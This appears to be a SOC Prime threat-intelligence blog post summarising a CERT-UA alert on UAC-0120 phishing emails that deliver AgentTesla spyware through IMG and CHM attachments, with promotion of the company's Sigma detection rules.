AgentTesla Mass Distribution

On August 30 and 31, 2022, CERT-UA revealed a burst of adversary activity massively distributing phishing emails among Ukrainian, Austrian, and German organizations. According to the corresponding CERT-UA#5252 alert, hackers exploit the email attachment vector spreading the notorious AgentTesla info-stealing malware. The malicious activity can be attributed to the behavior patterns of the hacking collective tracked as UAC-0120.

AgentTesla Malware Distribution: Analysis of the Latest Email Campaigns by UAC-0120 

Since the world entered the global cyber war when russia launched its major invasion of Ukraine, russia-linked hacking collectives escalated their malicious activity by launching cyberespionage campaigns and destructive cyber-attacks. As part of those campaigns, adversaries leveraged info-stealing malware samples, like IcedID Trojan and AgentTesla spyware. The latter belongs to one of the widely-used spyware Trojans designed to steal sensitive data from compromised users. AgentTesla malware emerged in earlier cyber-attacks against Ukraine attributed to the malicious activity of the UAC-0041 hacking group

On August 31, 2022, CERT-UA issued an alert CERT-UA#5252 warning the global cyber defender community of a new wave of cyber-attacks by the UAC-0120 hacking group massively spreading AgentTesla spyware. Adversaries launch ongoing phishing email campaigns targeting organizations across Ukraine, Austria, and Germany. These emails contain malicious IMG attachments named “Technisches Zeichnen” (“Technical Drawing”) used as phishing lures to trick victims into opening them and spreading infection. The IMG lure comes with a CHM file, which, if opened, executes malicious JavaScript code. The latter downloads and launches the node.txt file via PowerShell script. 

As a result, the PowerShell code executes DLL and EXE files, the latter being AgentTesla spyware, which infects the compromised systems. According to the CERT-UA research, similar phishing emails were delivered on August 11, but they used other lures for email subjects and attachments. 

Detecting the UAC-0120 Activity: Sigma Rules to Proactively Defend Against Phishing Attacks Spreading AgentTesla

To proactively defend against the emerging adversary activity of diverse hacking collectives spreading info-stealing malware, cybersecurity researchers are looking for ways to boost threat detection capabilities and accelerate threat hunting velocity. The SOC Prime Team curates a set of unique Sigma rules to detect the malicious activity of the UAC-0120 group, which is behind ongoing cyber-attacks distributing AgentTesla spyware. Since these phishing campaigns target multiple organizations from Ukraine, Austria, and Germany, cyber defenders should stay on alert to timely identify the infection in their organization’s infrastructure and mitigate the potential threat. 

Cybersecurity practitioners can browse SOC Prime for the related threats based on the group identifier “UAC-0120” and instantly gain access to relevant Sigma rules enriched with insightful contextual metadata, like MITRE ATT&CK® and CTI references:

Sigma rules to detect the malicious activity of the UAC-0120 group massively distributing AgentTesla malware

All Sigma rules are available in SOC Prime’s Detection as Code platform and can be applied across supported industry-leading SIEM, EDR, and XDR technologies. 

Instantly access context-enriched Sigma rules for AgentTesla malware detection directly from SOC Prime’s Cyber Threats Search Engine. Click the Explore Detections button and drill down to the relevant detection content accompanied by comprehensive contextual information for in-depth threat investigation. Need more than just detection rules? Gain from Detection as Code available on demand offering utmost flexibility with a pre-paid balance.

Explore Detections Choose a Plan


All dedicated Sigma rules are aligned with the MITRE ATT&CK® framework addressing the following adversary tactics and techniques enabling cybersecurity professionals to instantly gain insights into the MITRE ATT&CK context behind the ongoing email campaigns of the UAC-0120 group:

Stay ahead of emerging threats with on-demand access to the latest and most relevant Detection-as-Code content available in SOC Prime’s platform. Choose the On-Demand subscription plan and save up to 2,200 hours on threat research and detection content development while maximizing the value of your SOC team resources. 

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts